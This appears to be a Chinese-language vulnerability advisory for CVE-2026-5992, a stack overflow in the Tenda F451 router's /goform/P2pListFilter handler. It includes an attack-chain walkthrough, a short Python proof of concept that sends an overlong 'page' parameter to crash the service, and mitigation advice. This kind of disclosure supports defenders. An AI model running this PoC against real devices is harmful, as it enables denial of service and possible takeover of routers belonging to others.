CVE-2026-5992 CVSS 8.8 高危

CVE-2026-5992 Tenda F451栈溢出漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5992

漏洞类型

栈溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda F451

漏洞概述

Tenda F451路由器1.0.0.7版本存在严重安全漏洞。漏洞位于/goform/P2pListFilter接口的fromP2pListFilter函数中，因对page参数处理不当引发栈溢出。攻击者仅需低权限即可通过网络远程利用，无需用户交互，可能导致设备被完全控制，造成机密性、完整性和可用性的全面影响。

技术细节

该漏洞的成因在于Tenda F451路由器固件版本1.0.0.7中，Web管理服务处理/goform/P2pListFilter请求时存在严重的编程缺陷。具体而言，fromP2pListFilter函数在接收用户提交的'page'参数时，未执行有效边界检查，直接将该参数拷贝至栈上的固定长度缓冲区。攻击者可利用这一缺陷，构造包含恶意载荷的超长字符串参数。当CVSS指标显示攻击复杂度低且无需用户交互时，攻击者仅需具备低权限账户即可通过网络发起攻击。恶意数据溢出后将覆盖栈帧的返回地址，劫持程序执行流。由于IoT设备通常缺乏现代操作系统级别的缓解措施（如ASLR），攻击者成功率极高，最终可能导致设备被植入后门，造成敏感数据泄露或设备被僵尸网络控制。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别目标设备为Tenda F451路由器，并确认其运行固件版本1.0.0.7。

STEP 2

获取访问权

攻击者利用低权限账户（或默认凭据）登录Web管理界面，满足PR:L的要求。

STEP 3

漏洞利用

攻击者向/goform/P2pListFilter端点发送特制的HTTP POST请求，其中包含超长的page参数，触发栈溢出。

STEP 4

代码执行

溢出覆盖返回地址，控制程序流跳转至恶意Shellcode，从而在目标设备上执行任意命令。

STEP 5

建立控制

攻击者获得设备的最高权限，可以修改系统配置、窃取网络流量或将设备加入僵尸网络。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Target endpoint vulnerable to stack overflow
    url = f"http://{target_ip}/goform/P2pListFilter"
    
    # Constructing payload to trigger buffer overflow
    # The exact offset needs to be determined via fuzzing
    # Sending a large string to overwrite the return address
    payload = "A" * 1000 
    
    data = {
        "page": payload
    }
    
    try:
        print(f"[*] Sending payload to {url}")
        response = requests.post(url, data=data, timeout=5)
        print(f"[+] Status Code: {response.status_code}")
        # If the service crashes or hangs, the exploit likely succeeded
    except Exception as e:
        print(f"[!] Service appears to have crashed or network error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit(target)

影响范围

Tenda F451 1.0.0.7

防御指南

临时缓解措施

在官方发布补丁前，建议用户立即关闭路由器的远程Web管理功能，仅通过本地接入进行管理。同时，应通过ACL（访问控制列表）限制内网对路由器管理端口的访问权限，仅允许特定管理IP连接。切勿使用默认密码，并确保Wi-Fi加密已启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5992
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5992
3 Details https://www.cvedetails.com/cve/CVE-2026-5992/
4 VulDB https://vuldb.com/cve/CVE-2026-5992
5 Link https://github.com/Jimi-Lab/cve/issues/10
6 Link https://vuldb.com/submit/792863
7 Link https://vuldb.com/vuln/356546
8 Link https://vuldb.com/vuln/356546/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表